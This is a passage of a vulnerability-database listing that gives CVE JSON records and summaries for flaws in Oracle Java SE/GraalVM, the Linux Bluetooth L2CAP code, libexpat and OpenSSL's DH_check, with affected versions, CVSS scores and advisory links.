Version: Oracle Java SE:11.0.22 Version: Oracle Java SE:17.0.10 Version: Oracle Java SE:21.0.2 Version: Oracle Java SE:22 Version: Oracle GraalVM for JDK:17.0.10 Version: Oracle GraalVM for JDK:21.0.2 Version: Oracle GraalVM for JDK:22 Version: Oracle GraalVM Enterprise Edition:20.3.13 Version: Oracle GraalVM Enterprise Edition:21.3.9 cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:* |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-21012", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-26T15:15:43.795792Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-276", "description": "CWE-276 Incorrect Default Permissions", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-13T17:25:25.373Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:13:42.060Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "cpes": [ "cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:*" ], "product": "Java SE JDK and JRE", "vendor": "Oracle Corporation", "versions": [ { "status": "affected", "version": "Oracle Java SE:11.0.22" }, { "status": "affected", "version": "Oracle Java SE:17.0.10" }, { "status": "affected", "version": "Oracle Java SE:21.0.2" }, { "status": "affected", "version": "Oracle Java SE:22" }, { "status": "affected", "version": "Oracle GraalVM for JDK:17.0.10" }, { "status": "affected", "version": "Oracle GraalVM for JDK:21.0.2" }, { "status": "affected", "version": "Oracle GraalVM for JDK:22" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:20.3.13" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:21.3.9" } ] } ], "descriptions": [ { "lang": "en-US", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.", "lang": "en-US" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-16T21:26:02.245Z", "orgId": "43595867-4340-4103-b7a2-9a5208d29a85", "shortName": "oracle" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85", "assignerShortName": "oracle", "cveId": "CVE-2024-21012", "datePublished": "2024-04-16T21:26:02.245Z", "dateReserved": "2023-12-07T22:28:10.648Z", "dateUpdated": "2024-11-13T17:25:25.373Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-45934
Vulnerability from cvelistv5
Published
2022-11-27 00:00
Modified
2024-08-03 14:24
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:24:03.231Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=ae4569813a6e931258db627cdfe50dfb4f917d5d" }, { "name": "FEDORA-2022-90162a1d88", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDAKCGDW6CQ6G3RZWYZJO454R3L5CTQB/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0008/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=ae4569813a6e931258db627cdfe50dfb4f917d5d" }, { "name": "FEDORA-2022-90162a1d88", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDAKCGDW6CQ6G3RZWYZJO454R3L5CTQB/" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0008/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-45934", "datePublished": "2022-11-27T00:00:00", "dateReserved": "2022-11-27T00:00:00", "dateUpdated": "2024-08-03T14:24:03.231Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52425
Vulnerability from cvelistv5
Published
2024-02-04 00:00
Modified
2024-08-26 19:22
Severity ?
EPSS score ?
Summary
libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:55:41.543Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/libexpat/libexpat/pull/789" }, { "name": "FEDORA-2024-fbe1f0c1aa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNRIHC7DVVRAIWFRGV23Y6UZXFBXSQDB/" }, { "name": "FEDORA-2024-b8656bc059", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WNUBSGZFEZOBHJFTAD42SAN4ATW2VEMV/" }, { "name": "[debian-lts-announce] 20240409 [SECURITY] [DLA 3783-1] expat security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00006.html" }, { "name": "[oss-security] 20240320 Security fixes in Python 3.10.14, 3.9.19, and 3.8.19 (CVE-2023-6597 \u0026 CVE-2024-0450)", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240614-0003/" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "libexpat", "vendor": "libexpat_project", "versions": [ { "lessThanOrEqual": "2.5.0", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52425", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-26T19:20:56.852251Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-08-26T19:22:48.969Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-14T13:06:11.482117", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/libexpat/libexpat/pull/789" }, { "name": "FEDORA-2024-fbe1f0c1aa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNRIHC7DVVRAIWFRGV23Y6UZXFBXSQDB/" }, { "name": "FEDORA-2024-b8656bc059", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WNUBSGZFEZOBHJFTAD42SAN4ATW2VEMV/" }, { "name": "[debian-lts-announce] 20240409 [SECURITY] [DLA 3783-1] expat security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00006.html" }, { "name": "[oss-security] 20240320 Security fixes in Python 3.10.14, 3.9.19, and 3.8.19 (CVE-2023-6597 \u0026 CVE-2024-0450)", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "url": "https://security.netapp.com/advisory/ntap-20240614-0003/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-52425", "datePublished": "2024-02-04T00:00:00", "dateReserved": "2024-02-04T00:00:00", "dateUpdated": "2024-08-26T19:22:48.969Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-21094
Vulnerability from cvelistv5
Published
2024-04-16 21:26
Modified
2024-08-01 22:13
Severity ?
EPSS score ?
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Oracle Corporation | Java SE JDK and JRE |
Version: Oracle Java SE:8u401 Version: Oracle Java SE:8u401-perf Version: Oracle Java SE:11.0.22 Version: Oracle Java SE:17.0.10 Version: Oracle Java SE:21.0.2 Version: Oracle Java SE:22 Version: Oracle GraalVM for JDK:17.0.10 Version: Oracle GraalVM for JDK:21.0.2 Version: Oracle GraalVM for JDK:22 Version: Oracle GraalVM Enterprise Edition:20.3.13 Version: Oracle GraalVM Enterprise Edition:21.3.9 cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:* cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:* |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-21094", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-23T13:58:54.491709Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-349", "description": "CWE-349 Acceptance of Extraneous Untrusted Data With Trusted Data", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:37:51.570Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:13:42.604Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "cpes": [ "cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:*", "cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:*" ], "product": "Java SE JDK and JRE", "vendor": "Oracle Corporation", "versions": [ { "status": "affected", "version": "Oracle Java SE:8u401" }, { "status": "affected", "version": "Oracle Java SE:8u401-perf" }, { "status": "affected", "version": "Oracle Java SE:11.0.22" }, { "status": "affected", "version": "Oracle Java SE:17.0.10" }, { "status": "affected", "version": "Oracle Java SE:21.0.2" }, { "status": "affected", "version": "Oracle Java SE:22" }, { "status": "affected", "version": "Oracle GraalVM for JDK:17.0.10" }, { "status": "affected", "version": "Oracle GraalVM for JDK:21.0.2" }, { "status": "affected", "version": "Oracle GraalVM for JDK:22" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:20.3.13" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:21.3.9" } ] } ], "descriptions": [ { "lang": "en-US", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401, 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.", "lang": "en-US" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-16T21:26:30.112Z", "orgId": "43595867-4340-4103-b7a2-9a5208d29a85", "shortName": "oracle" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85", "assignerShortName": "oracle", "cveId": "CVE-2024-21094", "datePublished": "2024-04-16T21:26:30.112Z", "dateReserved": "2023-12-07T22:28:10.672Z", "dateUpdated": "2024-08-01T22:13:42.604Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3446
Vulnerability from cvelistv5
Published
2023-07-19 11:31
Modified
2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. One of those
checks confirms that the modulus ('p' parameter) is not too large. Trying to use
a very large modulus is slow and OpenSSL will not normally use a modulus which
is over 10,000 bits in length.
However the DH_check() function checks numerous aspects of the key or parameters
that have been supplied. Some of those checks use the supplied modulus value
even if it has already been found to be too large.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulernable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the '-check' option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:55:03.577Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230719.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc9867c1e03c22ebf56943be205202e576aabf23" }, { "name": "3.0.10 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1fa20cf2f506113c761777127a38bce5068740eb" }, { "name": "1.1.1v git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8780a896543a654e757db1b9396383f9d8095528" }, { "name": "1.0.2zi patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9a0a4d3c1e7138915563c0df4fe6a3f9377b839c" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/19/4" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/19/5" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/19/6" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/31/1" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230803-0011/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/16/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.2", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.10", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1v", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zi", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "OSSfuzz" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Matt Caswell" } ], "datePublic": "2023-07-13T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: Checking excessively long DH keys or parameters may be very slow.\u003cbr\u003e\u003cbr\u003eImpact summary: Applications that use the functions DH_check(), DH_check_ex()\u003cbr\u003eor EVP_PKEY_param_check() to check a DH key or DH parameters may experience long\u003cbr\u003edelays. Where the key or parameters that are being checked have been obtained\u003cbr\u003efrom an untrusted source this may lead to a Denial of Service.\u003cbr\u003e\u003cbr\u003eThe function DH_check() performs various checks on DH parameters. One of those\u003cbr\u003echecks confirms that the modulus (\u0027p\u0027 parameter) is not too large. Trying to use\u003cbr\u003ea very large modulus is slow and OpenSSL will not normally use a modulus which\u003cbr\u003eis over 10,000 bits in length.\u003cbr\u003e\u003cbr\u003eHowever the DH_check() function checks numerous aspects of the key or parameters\u003cbr\u003ethat have been supplied. Some of those checks use the supplied modulus value\u003cbr\u003eeven if it has already been found to be too large.\u003cbr\u003e\u003cbr\u003eAn application that calls DH_check() and supplies a key or parameters obtained\u003cbr\u003efrom an untrusted source could be vulernable to a Denial of Service attack.\u003cbr\u003e\u003cbr\u003eThe function DH_check() is itself called by a number of other OpenSSL functions.\u003cbr\u003eAn application calling any of those other functions may similarly be affected.\u003cbr\u003eThe other functions affected by this are DH_check_ex() and\u003cbr\u003eEVP_PKEY_param_check().\u003cbr\u003e\u003cbr\u003eAlso vulnerable are the OpenSSL dhparam and pkeyparam command line applications\u003cbr\u003ewhen using the \u0027-check\u0027 option.\u003cbr\u003e\u003cbr\u003eThe OpenSSL SSL/TLS implementation is not affected by this issue.\u003cbr\u003e\u003cbr\u003eThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue." } ], "value": "Issue summary: Checking excessively long DH keys or parameters may be very slow.\n\nImpact summary: Applications that use the functions DH_check(), DH_check_ex()\nor EVP_PKEY_param_check() to check a DH key or DH parameters may experience long\ndelays. Where the key or parameters that are being checked have been obtained\nfrom an untrusted source this may lead to a Denial of Service.\n\nThe function DH_check() performs various checks on DH parameters. One of those\nchecks confirms that the modulus (\u0027p\u0027 parameter) is not too large. Trying to use\na very large modulus is slow and OpenSSL will not normally use a modulus which\nis over 10,000 bits in length.\n\nHowever the DH_check() function checks numerous aspects of the key or parameters\nthat have been supplied. Some of those checks use the supplied modulus value\neven if it has already been found to be too large.\n\nAn application that calls DH_check() and supplies a key or parameters obtained\nfrom an untrusted source could be vulernable to a Denial of Service attack.\n\nThe function DH_check() is itself called by a number of other OpenSSL functions.\nAn application calling any of those other functions may similarly be affected.\nThe other functions affected by this are DH_check_ex() and\nEVP_PKEY_param_check().\n\nAlso vulnerable are the OpenSSL dhparam and pkeyparam command line applications\nwhen using the \u0027-check\u0027 option.\n\nThe OpenSSL SSL/TLS implementation is not affected by this issue.\nThe OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-606", "description": "CWE-606 Unchecked Input for Loop Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:47.238Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230719.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc9867c1e03c22ebf56943be205202e576aabf23" }, { "name": "3.0.10 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1fa20cf2f506113c761777127a38bce5068740eb" }, { "name": "1.1.1v git commit", "tags": [ "patch" ], "url": 